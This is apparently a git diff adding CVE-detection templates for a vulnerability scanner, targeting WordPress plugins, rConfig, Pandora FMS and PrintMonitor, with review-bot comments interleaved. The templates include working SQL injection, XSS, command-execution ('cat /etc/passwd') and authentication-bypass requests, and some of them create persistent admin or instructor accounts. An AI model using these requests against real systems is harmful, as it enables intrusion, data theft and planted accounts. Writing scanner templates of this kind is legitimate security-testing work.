diff --git a/helpers/payloads/wp-social-warfare-rce.txt b/helpers/payloads/wp-social-warfare-rce.txt new file mode 100644 index 0000000000..b0b0564f84 --- /dev/null +++ b/helpers/payloads/wp-social-warfare-rce.txt @@ -0,0 +1 @@ +
system('cat /etc/passwd')
diff --git a/http/cves/2015/CVE-2015-20067.yaml b/http/cves/2015/CVE-2015-20067.yaml new file mode 100644 index 0000000000..10fae655b1 --- /dev/null +++ b/http/cves/2015/CVE-2015-20067.yaml @@ -0,0 +1,40 @@ +id: CVE-2015-20067 + +info: + name: WP Attachment Export < 0.2.4 - Unrestricted File Download + author: r3Y3r53 + severity: high + description: | + The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress + powered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text. + remediation: Fixed in 0.2.4 + reference: + - https://wpscan.com/vulnerability/d1a9ed65-baf3-4c85-b077-1f37d8c7793a + - https://packetstormsecurity.com/files/132693/ + - https://seclists.org/fulldisclosure/2015/Jul/73 + - https://nvd.nist.gov/vuln/detail/CVE-2015-20067 + classification: + cve-id: CVE-2015-20067 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: 862 + metadata: + max-request: 2 + verified: true + google-query: inurl:"/wp-content/plugins/wp-attachment-export/" + tags: cve,cve2015,wordpress,wp,wp-plugin,unauth,wp-attachment-export,wpscan + +http: + - method: GET + path: + - "{{BaseURL}}/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true" + - "{{BaseURL}}/wp-admin/tools.php?content=&wp-attachment-export-download=true" + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(header, "text/xml")' + - 'contains_all(body, "title","wp:author_id","wp:author_email")' + condition: and diff --git a/http/cves/2018/CVE-2018-7282.yaml b/http/cves/2018/CVE-2018-7282.yaml new file mode 100644 index 0000000000..47987b4ab7 --- /dev/null +++ b/http/cves/2018/CVE-2018-7282.yaml 
@@ -0,0 +1,48 @@ +id: CVE-2018-7282 + +info: + name: TITool PrintMonitor - Blind SQL Injection + author: theamanrawat + severity: critical + description: | + The username parameter of the TITool PrintMonitor solution during the login request is vulnerable to and/or time-based blind SQLi. + remediation: Upgrade to PM18.2.1. + reference: + - https://fenceposterror.github.io/cve-2018-7282.txt + - https://nvd.nist.gov/vuln/detail/CVE-2018-7282 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-7282 + cwe-id: CWE-89 + cpe: cpe:2.3:a:titool:printmonitor:*:*:*:*:*:*:*:* + metadata: + verified: "true" + shodan-query: title:"PrintMonitor" + max-request: 1 + vendor: titool + product": printmonitor + tags: cve,cve2018,sqli,printmonitor,unauth + +variables: + username: "{{rand_base(6)}}" + password: "{{rand_base(8)}}" + +http: + - raw: + - | + @timeout: 20s + POST /login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}')+OR+4191=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(50000000/2))))--+vDwl&password={{password}}&language=en + + host-redirects: true + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(body, "PrintMonitor") && contains(header, "text/html")' + condition: and diff --git a/http/cves/2019/CVE-2019-15829.yaml b/http/cves/2019/CVE-2019-15829.yaml new file mode 100644 index 0000000000..bfd21878b7 --- /dev/null +++ b/http/cves/2019/CVE-2019-15829.yaml 
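Review bot: The metadata line `product": printmonitor` carries a stray double quote, so the key is either `product"` or a YAML parse error depending on the loader; it should read `product: printmonitor`. The sibling `verified: "true"` is a quoted string where the other templates in this change use the bare boolean `verified: true`, which is the form the template schema expects. Separately, the single time-based probe (`RANDOMBLOB(50000000/2)` with `duration>=6`) has no baseline request, so a slow but patched host can satisfy the DSL; a second, payload-free request compared against the first would make the timing signal meaningful.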
@@ -0,0 +1,44 @@ +id: CVE-2019-15829 + +info: + name: Gallery Photoblocks < 1.1.43 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The Gallery PhotoBlocks WordPress plugin was affected by an Authenticated Reflected XSS security vulnerability. + remediation: Fixed in 1.1.43 + reference: + - https://wpscan.com/vulnerability/b8d1d88e-f2e5-4212-af34-c91f563f07b6/ + - https://nvd.nist.gov/vuln/detail/CVE-2019-15829 + - https://wordpress.org/plugins/photoblocks-grid-gallery/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cwe-id: CWE-79 + metadata: + max-request: 2 + verified: true + publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/" + tags: cve,cve2023,wp,wordpress,wp-plugin,photoblocks-gallery,xss,authenticated,wpscan + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=photoblocks-edit&id=%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_2, "")' + - 'contains(body_2, "post galleries!")' + condition: and diff --git a/http/cves/2020/CVE-2020-10220.yaml b/http/cves/2020/CVE-2020-10220.yaml index aa38a9a787..c2f2b241db 100644 --- a/http/cves/2020/CVE-2020-10220.yaml +++ b/http/cves/2020/CVE-2020-10220.yaml @@ -1,8 +1,8 @@ id: CVE-2020-10220 info: - name: rConfig 3.9 - SQL injection - author: ritikchaddha + name: rConfig 3.9 - SQL Injection + author: ritikchaddha,theamanrawat severity: critical description: | An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter. 
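Review bot: The matcher `contains(body_2, "")` is vacuously true, so the template effectively only checks for a 200 and the string "post galleries!", which a patched version also returns to a logged-in admin; it looks like the reflected marker was lost from the string and should be restored, e.g. `contains(body_2, "<svg/onload=alert(document.domain)>")`, matching the `id=` payload sent. The tags line says `cve2023` for a 2019 CVE and should be `cve2021`-style corrected to `cve2019`. The cvss vector (`PR:H`) agrees with the `authenticated` tag, so that part is consistent.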
@@ -29,21 +29,21 @@ info: product: rconfig shodan-query: title:"rConfig" tags: packetstorm,cve,cve2020,rconfig,sqli + variables: num: "999999999" http: - - raw: - - | - GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5({{num}}),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('{{num}}'),0x5B50574E5D3C42523E)%20limit%200,1),NULL--" matchers-condition: and matchers: - type: word part: body words: - - '{{md5({{num}})}}' + - "{{md5(num)}}" - type: status status: diff --git a/http/cves/2020/CVE-2020-12256.yaml b/http/cves/2020/CVE-2020-12256.yaml new file mode 100644 index 0000000000..d97268ad1a --- /dev/null +++ b/http/cves/2020/CVE-2020-12256.yaml 
@@ -0,0 +1,48 @@ +id: CVE-2020-12256 +info: + name: rConfig 3.9.4 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The rConfig 3.9.4 is vulnerable to cross-site scripting. The devicemgmnt.php file improperly validates the request coming from the user input. Due to this flaw, An attacker can exploit this vulnerability by crafting arbitrary javascript in `deviceId` GET parameter of devicemgmnt.php resulting in execution of the javascript. + reference: + - https://www.rconfig.com/downloads/rconfig-3.9.4.zip + - https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8 + - https://nvd.nist.gov/vuln/detail/CVE-2020-12256 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-12256 + cwe-id: CWE-79 + metadata: + verified: "true" + shodan-query: http.title:"rConfig" + max-request: 1 + tags: cve,cve2020,rconfig,authenticated,xss + +http: + - raw: + - | + GET /login.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /lib/crud/userprocess.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user={{username}}&pass={{password}}&sublogin=1 + + - | + GET /devicemgmt.php?deviceId="> HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + host-redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "") && contains(body_3, "rConfig - Configuration Management")' + - 'contains(content_type_3, "text/html")' + condition: and diff --git a/http/cves/2020/CVE-2020-12259.yaml b/http/cves/2020/CVE-2020-12259.yaml new file mode 100644 index 0000000000..7dd547691a --- /dev/null +++ b/http/cves/2020/CVE-2020-12259.yaml 
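Review bot: The third request sends `deviceId=">` with no actual script payload, and the matcher `contains(body_3, "")` is always true, so the template only proves that an authenticated user can load devicemgmt.php; the reflected marker appears to have been stripped from both places and needs to be restored (for example `"><img src=x onerror=alert(document.domain)>` in the request and the same string in the DSL). `max-request: 1` undercounts a three-request flow and should be `max-request: 3`. The description also names `devicemgmnt.php` while the request targets `devicemgmt.php`; the latter is presumably correct.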
@@ -0,0 +1,48 @@ +id: CVE-2020-12259 +info: + name: rConfig 3.9.4 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + rConfig 3.9.4 is vulnerable to reflected XSS. The configDevice.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the rid GET parameter of devicemgmnt.php + reference: + - https://www.rconfig.com/downloads/rconfig-3.9.4.zip + - https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8 + - https://nvd.nist.gov/vuln/detail/CVE-2020-12259 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-12259 + cwe-id: CWE-79 + metadata: + verified: "true" + shodan-query: http.title:"rConfig" + max-request: 1 + tags: cve,cve2020,rconfig,authenticated,xss + +http: + - raw: + - | + GET /login.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /lib/crud/userprocess.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user={{username}}&pass={{password}}&sublogin=1 + + - | + GET /configDevice.php?rid="> HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + host-redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "") && contains(body_3, "rConfig - Configuration Management")' + - 'contains(content_type_3, "text/html")' + condition: and diff --git a/http/cves/2020/CVE-2020-13638.yaml b/http/cves/2020/CVE-2020-13638.yaml new file mode 100644 index 0000000000..50159232be --- /dev/null +++ b/http/cves/2020/CVE-2020-13638.yaml 
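Review bot: As in the CVE-2020-12256 template, the request `GET /configDevice.php?rid=">` carries no script payload and `contains(body_3, "")` is vacuously true, so a patched rConfig that simply renders configDevice.php for a logged-in user will match; restore the reflected marker in the `rid` parameter and match on that exact string in `body_3`. `max-request: 1` should be `max-request: 3` for the login, login-page and injection requests. The description says the payload goes in the `rid` parameter of `devicemgmnt.php`, but the request targets `configDevice.php`; align the text with the request.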
@@ -0,0 +1,95 @@ +id: CVE-2020-13638 + +info: + name: rConfig 3.9 - Authentication Bypass(Admin Login) + author: theamanrawat + severity: critical + description: | + lib/crud/userprocess.php in rConfig 3.9.x before 3.9.7 has an authentication bypass, leading to administrator account creation. This issue has been fixed in 3.9.7. + reference: + - https://www.rconfig.com/downloads/rconfig-3.9.4.zip + - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-13638 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-13638 + cwe-id: CWE-89 + metadata: + verified: true + shodan-query: http.title:"rConfig" + tags: cve,cve2020,rconfig,auth-bypass + +variables: + username: "{{to_lower(rand_text_alpha(5))}}" + password: "{{rand_text_alphanumeric(12)}}!" + email: "{{rand_base(8)}}@{{rand_base(5)}}.com" + +http: + - raw: + - | + POST /lib/crud/userprocess.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb + + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="username" + + {{username}} + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="passconf" + + {{password}} + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="password" + + {{password}} + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="email" + + {{email}} + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="editid" + + + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="add" + + add + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="ulevelid" + + 9 + --01b28e152ee044338224bf647275f8eb-- + + - | + GET /login.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /lib/crud/userprocess.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + 
user={{username}}&pass={{password}}&sublogin=1 + + cookie-reuse: true + host-redirects: true + matchers-condition: and + matchers: + - type: word + part: body_3 + words: + - "rConfig - Configuration Management" + - "Logged in as" + - "dashboadFieldSet" + condition: and + + - type: word + part: header_3 + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-13851.yaml b/http/cves/2020/CVE-2020-13851.yaml new file mode 100644 index 0000000000..1ec67577d7 --- /dev/null +++ b/http/cves/2020/CVE-2020-13851.yaml @@ -0,0 +1,46 @@ +id: CVE-2020-13851 + +info: + name: Artica Pandora FMS 7.44 - Remote Code Execution + author: theamanrawat + severity: high + description: | + Artica Pandora FMS 7.44 allows remote command execution via the events feature. + reference: + - https://packetstormsecurity.com/files/158390/Pandora-FMS-7.0-NG-7XX-Remote-Command-Execution.html + - https://nvd.nist.gov/vuln/detail/CVE-2020-13851 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-13851 + cwe-id: CWE-78 + metadata: + verified: "true" + shodan-query: title:"Pandora FMS" + max-request: 1 + tags: cve,cve2020,rce,pandora,unauth,artica + +http: + - raw: + - | + POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + + - type: word + part: header + words: + - "text/html" + - "PHPSESSID=" + condition: and + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-8615.yaml b/http/cves/2020/CVE-2020-8615.yaml new file mode 100644 index 0000000000..1fdb90075c --- /dev/null +++ b/http/cves/2020/CVE-2020-8615.yaml 
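Review bot: The first request creates a persistent administrator (`ulevelid` = 9) with random credentials on every scanned host and nothing removes it afterwards, so a successful run leaves a backdoor account whose password is only known to whoever captured the scan output; the template should be tagged `intrusive` (`tags: cve,cve2020,rconfig,auth-bypass,intrusive`) and the description should say that an account is left behind. `cwe-id: CWE-89` classifies this as SQL injection, whereas the description is an authentication bypass leading to account creation, so CWE-287 or CWE-306 appears to be the right weakness. The metadata also lacks `max-request: 3` for the three-request flow.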
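Review bot: The classification line `cve-id: CVE-2022-13851` contradicts `id: CVE-2020-13851` and the NVD reference; it should be `cve-id: CVE-2020-13851`, otherwise the template is indexed under a non-existent identifier. The cvss vector says `PR:L` while the tags say `unauth` and the request carries no session, so one of the two should be corrected to match how the template actually exploits the endpoint. The POST also declares a form content type but sends no body; if the server side only needs the query string, a GET (or a comment explaining why POST is required) would be clearer.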
@@ -0,0 +1,56 @@ +id: CVE-2020-8615 + +info: + name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery + author: r3Y3r53 + severity: medium + description: | + A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors). + remediation: update to v.1.5.3 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-8615 + - https://wpscan.com/vulnerability/10058 + - http://packetstormsecurity.com/files/156585/WordPress-Tutor-LMS-1.5.3-Cross-Site-Request-Forgery.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N + cvss-score: 6.5 + cwe-id: CWE-352 + cve-id: CVE-2020-8615 + cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/tutor/" + tags: cve,cve2023,csrf,wp-plugin,wp,tutor,wordpress,wpscan + +variables: + user: "{{rand_base(6)}}" + pass: "{{rand_base(8)}}" + email: "{{randstr}}@{{rand_base(5)}}.com" + firstname: "{{rand_base(5)}}" + lastname: "{{rand_base(5)}}" + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'contains(content_type_2, "application/json")' + - 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")' + - 'status_code_2 == 200' + condition: and 
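Review bot: The tags line uses `cve2023` for a 2020 CVE and should be `cve2020`. The admin-ajax request creates a persistent instructor account (`user_login={{user}}` with a random password) and never deletes it, so the template should carry an `intrusive` tag and note the leftover user in the description. The body also sends `action=` twice (`add_new_instructor` and `tutor_add_instructor`); PHP keeps the last value, so the first is dead weight and should be dropped to avoid confusion, and `max-request: 1` should be `max-request: 2`.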
diff --git a/http/cves/2021/CVE-2021-24215.yaml b/http/cves/2021/CVE-2021-24215.yaml new file mode 100644 index 0000000000..50098e6721 --- /dev/null +++ b/http/cves/2021/CVE-2021-24215.yaml @@ -0,0 +1,45 @@ +id: CVE-2021-24215 + +info: + name: Controlled Admin Access WordPress Plugin <= 1.4.0 - Improper Access Control & Privilege Escalation + author: r3Y3r53 + severity: critical + description: | + An Improper Access Control vulnerability was discovered in the plugin. Uncontrolled access to the website customization functionality and global CMS settings, like /wp-admin/customization.php and /wp-admin/options.php, can lead to a complete compromise of the target resource. + remediation: Fixed in version 1.5.2 + reference: + - https://wpscan.com/vulnerability/eec0f29f-a985-4285-8eed-d1855d204a20 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24215 + - https://www.opencve.io/cve/CVE-2021-24215 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cwe-id: CWE-284 + cpe: cpe:2.3:a:wpruby:controlled_admin_access:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/controlled-admin-access/" + tags: cve,cve2021,authenticated,wpscan,wordpress,wp-plugin,wp,controlled-admin-access + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/options.php HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "This page allows direct access to your site settings") && contains(body_2, "Controlled Admin Access")' + condition: and diff --git a/http/cves/2021/CVE-2021-24286.yaml b/http/cves/2021/CVE-2021-24286.yaml new file mode 100644 index 0000000000..630f047ced --- /dev/null +++ b/http/cves/2021/CVE-2021-24286.yaml 
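Review bot: The matcher relies on options.php rendering "This page allows direct access to your site settings", which WordPress shows to any administrator regardless of this plugin, so if the supplied `{{username}}` is an admin the template reports a vulnerability on fully patched sites; the check is only meaningful when the credentials belong to a restricted user created by Controlled Admin Access, and the description should state that precondition. It is also unclear from the hunk that `contains(body_2, "Controlled Admin Access")` proves the restricted role rather than just plugin presence; a check tied to the restricted user (for example the plugin's own menu or the absence of full admin menus) would be stronger. `max-request: 1` should be `max-request: 2` for the two-request flow.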
@@ -0,0 +1,45 @@ +id: CVE-2021-24286 + +info: + name: WordPress Plugin Redirect 404 to Parent 1.3.0 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue. + remediation: Fixed in version 1.3.1 + reference: + - https://wpscan.com/vulnerability/b9a535f3-cb0b-46fe-b345-da3462584e27 + - https://www.exploit-db.com/exploits/50350 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24286 + - https://wordpress.org/plugins/redirect-404-to-parent/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + cpe: cpe:2.3:a:mooveagency:redirect_404_to_parent:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + tags: xss,cve,cve2023,wordpress,wpscan,authenticated,exploitdb,wp-plugin + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/options-general.php?page=moove-redirect-settings&tab=%22+style%3Danimation-name%3Arotation+onanimationstart%3D%22alert%28document.domain%29%3B HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "alert%28document.domain%29") && contains(body_2, "Moove redirect 404")' + - 'status_code_2 == 200' + condition: and diff --git a/http/cves/2021/CVE-2021-24627.yaml b/http/cves/2021/CVE-2021-24627.yaml new file mode 100644 index 0000000000..775b0bccbc --- /dev/null +++ b/http/cves/2021/CVE-2021-24627.yaml 
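Review bot: The tags line says `cve2023` for a 2021 CVE and should be `cve2021`, and `max-request: 1` undercounts the login-plus-GET flow (`max-request: 2`). The matcher looks for the percent-encoded string `alert%28document.domain%29`, which only holds if the plugin echoes the raw request URI; if it outputs the decoded `tab` value the reflection would contain `alert(document.domain)` and this template would never match, so it is worth confirming which form the verified target returned and matching on that. The cvss vector `PR:N` sits next to an `authenticated` tag; reflected XSS is conventionally scored PR:N, but a one-line comment explaining that the login is only needed to reach the admin page would stop readers flagging the mismatch.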
@@ -0,0 +1,57 @@ +id: CVE-2021-24627 + +info: + name: G Auto-Hyperlink <= 1.0.1 - SQL Injection + author: theamanrawat + severity: high + description: | + The G Auto-Hyperlink WordPress plugin through 1.0.1 does not sanitise or escape an 'id' GET parameter before using it in a SQL statement, to select data to be displayed in the admin dashboard, leading to an authenticated SQL injection + reference: + - https://wordpress.org/plugins/g-auto-hyperlink/ + - https://wpscan.com/vulnerability/c04ea768-150f-41b8-b08c-78d1ae006bbb + - https://nvd.nist.gov/vuln/detail/CVE-2021-24627 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2021-24627 + cwe-id: CWE-89 + metadata: + verified: true + publicwww-query: "/wp-content/plugins/g-auto-hyperlink/" + tags: cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,g-auto-hyperlink,authenticated + +variables: + num: 999999999 + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+I + + - | + GET /wp-admin/admin.php?page=g-auto-hyperlink-edit&id=-2198+UNION+ALL+SELECT+NULL%2Cmd5%28{{num}}%29%2Ccurrent_user%28%29%2Ccurrent_user%28%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - "c8c605999f3d8352d7bb792cf3fdb25b" + - "Keyword" + - "g-auto-hyperlink-edit" + condition: and + + - type: word + part: header_2 + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/http/cves/2021/CVE-2021-24791.yaml b/http/cves/2021/CVE-2021-24791.yaml new file mode 100644 index 0000000000..d62534c6de --- /dev/null +++ b/http/cves/2021/CVE-2021-24791.yaml 
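Review bot: This template uses the deprecated top-level `requests:` key while every other template in this change uses `http:`; it should be `http:` for consistency and to avoid the legacy code path. The login body is truncated to `wp-submit=Log+I` (the sibling templates send `wp-submit=Log+In`), which may still log in but is clearly a typo. The hard-coded hash `c8c605999f3d8352d7bb792cf3fdb25b` is presumably md5 of the `num` variable; writing it as `{{md5(num)}}` ties the expectation to the payload, and `num: 999999999` should be quoted so it stays a string, with `max-request: 2` added to the metadata.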
@@ -0,0 +1,46 @@ +id: CVE-2021-24791 +info: + name: Header Footer Code Manager < 1.1.14 - Admin+ SQL Injection + author: r3Y3r53 + severity: high + description: | + The Header Footer Code Manager WordPress plugin before 1.1.14 does not validate and escape the "orderby" and "order" request parameters before using them in a SQL statement when viewing the Snippets admin dashboard, leading to SQL injections + remediation: Fixed in version 1.1.14 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-24791 + - https://wpscan.com/vulnerability/d55caa9b-d50f-4c13-bc69-dc475641735f + - https://wordpress.org/plugins/header-footer-code-manager/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2021-24791 + cwe-id: CWE-89 + metadata: + verified: true + max-request: 1 + google-query: inurl:"/wp-content/plugins/wp-custom-pages/" + tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated,header-footer-code-manager + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + @timeout: 20s + GET /wp-admin/admin.php?page=hfcm-list&orderby=%28SELECT+5619+FROM+%28SELECT%28SLEEP%286%29%29%29uWCv%29&order=DESC HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2,"Add New Snippet")' + condition: and diff --git a/http/cves/2021/CVE-2021-24915.yaml b/http/cves/2021/CVE-2021-24915.yaml new file mode 100644 index 0000000000..e5df14c463 --- /dev/null +++ b/http/cves/2021/CVE-2021-24915.yaml 
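Review bot: The metadata `google-query: inurl:"/wp-content/plugins/wp-custom-pages/"` points at a different plugin; for Header Footer Code Manager it should be `inurl:"/wp-content/plugins/header-footer-code-manager/"`. The DSL uses an unsuffixed `duration>=6` in a two-request template, whereas the CVE-2022-0228 template in this same change writes `duration_2>=7` for the identical pattern; use `duration_2>=6` so the timing check is unambiguously bound to the injection response rather than the login. `max-request: 1` should be `max-request: 2`.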
@@ -0,0 +1,53 @@ +id: CVE-2021-24915 + +info: + name: Contest Gallery < 13.1.0.6 - SQL injection + author: r3Y3r53 + severity: critical + description: | + The plugin does not have capability checks and does not sanitise or escape the cg-search-user-name-original parameter before using it in a SQL statement when exporting users from a gallery, which could allow unauthenticated to perform SQL injections attacks, as well as get the list of all users registered on the blog, including their username and email address. + remediation: Fixed in version 13.1.0.6 + reference: + - https://wpscan.com/vulnerability/45ee86a7-1497-4c81-98b8-9a8e5b3d4fac + - https://gist.github.com/tpmiller87/6c05596fe27dd6f69f1aaba4cbb9c917 + - https://wordpress.org/plugins/contest-gallery/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-24915 + cwe-id: CWE-89 + metadata: + max-request: 1 + verified: true + public-query: "/wp-content/plugins/contest-gallery/" + tags: cve,cve2021,wordpress,wp-plugin,wpscan,wp,contest-gallery + +http: + - raw: + - | + POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + cg-search-user-name=&cg-search-user-name-original=%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x717a6b7871%2CIFNULL%28CAST%28VERSION%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x716b707871%29%2CNULL--%20-&cg_create_user_data_csv_new_export=true&cg-search-gallery-id-original=&cg-search-gallery-id=&cg_create_user_data_csv=true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'WpUserId' + - 'Username' + - 'Usermail' + condition: and + + - type: word + part: header + words: + - 'text/csv' + - 'filename=' + condition: and + + - type: status + status: + - 200 diff --git a/http/cves/2021/CVE-2021-24979.yaml b/http/cves/2021/CVE-2021-24979.yaml new file mode 100644 index 0000000000..9fac7ddd68 
